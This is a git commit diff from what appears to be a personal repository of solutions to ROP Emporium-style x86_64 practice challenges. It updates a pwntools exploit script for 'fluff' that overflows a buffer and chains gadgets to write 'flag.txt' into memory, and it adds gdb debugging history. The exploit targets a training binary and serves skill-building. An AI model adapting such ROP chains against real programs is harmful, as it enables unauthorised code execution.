diff options
author | Brett Weiland <techcrazybsw@gmail.com> | 2020-12-18 01:42:14 -0600 |
---|---|---|
committer | Brett Weiland <techcrazybsw@gmail.com> | 2020-12-18 01:42:14 -0600 |
commit | 406768c5fead9fcadc9dc466da4286e5ac3c7274 (patch) | |
tree | 6d546250c6dbb09b49223f0139d4ef63defc7269 /x86_64/fluff | |
parent | 4c25bd918847e914875e900285008eb3865ca8b6 (diff) |
deleted: x86_64/badchars/core
modified: x86_64/fluff/.gdb_history
deleted: x86_64/fluff/core
modified: x86_64/fluff/exploit.py
deleted: x86_64/ret2win/core
deleted: x86_64/split/core
deleted: x86_64/write4/core
Diffstat (limited to 'x86_64/fluff')
-rw-r--r-- | x86_64/fluff/.gdb_history | 47 | ||||
-rw-r--r-- | x86_64/fluff/core | bin | 4292608 -> 0 bytes | |||
-rwxr-xr-x | x86_64/fluff/exploit.py | 30 |
3 files changed, 46 insertions, 31 deletions
diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history index cfa1057..0d0b7f2 100644 --- a/x86_64/fluff/.gdb_history +++ b/x86_64/fluff/.gdb_history @@ -1,19 +1,4 @@ quit -quit -continue -nexti -nexti -info reg rdi -stepi -nexti -info reg rcx -nexti -info reg rbx -stepi -info reg rdx -inro reg rbx -info reg rbx -quit stepi continue stepi @@ -237,3 +222,35 @@ x/x 0x601be0 + 8 x/x 0x601be0 + 9 x/x 0x601be0 + 10 quit +continue +context +x/x 0x7fff0b74fed0 +x/100x 0x7fff0b74fed0 +quit +break *0x400639 +continue +context +continue +x/s 0x601be0 +continue +x/s 0x601be0 +stepi +stepi +x/s 0x601be0 +quit +continue +continue +quit +break *0x00000000004006a3 +continue +continue +quit +break pwnme +run +continue +break *0x00000000004006a3 +continue +info reg rip +continue +info reg rip +quit diff --git a/x86_64/fluff/core b/x86_64/fluff/core Binary files differdeleted file mode 100644 index ae36a67..0000000 --- a/x86_64/fluff/core +++ /dev/null diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py index cdf5de8..2b520d8 100755 --- a/x86_64/fluff/exploit.py +++ b/x86_64/fluff/exploit.py @@ -13,37 +13,35 @@ letter_lookups = { def write_str(dest, string, payload): payload += p64(0x00000000004006a3) payload += p64(dest) - for c in string: - payload += p64(0x40062a) - payload += p64(0x4000) # if things go wrong, check endian/order + payload += p64(0x0000000000400610) + payload += p64(1) + payload += p64(0x40062a) + payload += p64(0x4000) + payload += p64(letter_lookups[string[0]] - 0x3ef2) + payload += p64(0x400628) + payload += p64(0x400639) + + + for c in string[1:]: + payload += p64(0x40062b) payload += p64(letter_lookups[c] - 0x3ef2) - payload += p64(0x0000000000400610) - payload += p64(0) - + payload += p64(1) payload += p64(0x400628) - payload += p64(0x400639) return(payload) -prog = gdb.debug('./fluff', gdbscript=''' -break *pwnme + 151 -''' -) +prog = process('./fluff') payload = b'' for c in range(40): payload += b'a' payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload) payload += p64(0x00000000004006a3) -payload += p64(0x601be0) # set rdi - +payload += p64(0x601be0) payload += p64(0x0000000000400510) -payload += b"\n" prog.sendline(payload) -sleep(1) -print(str(prog.recv(), 'UTF-8')) prog.interactive() |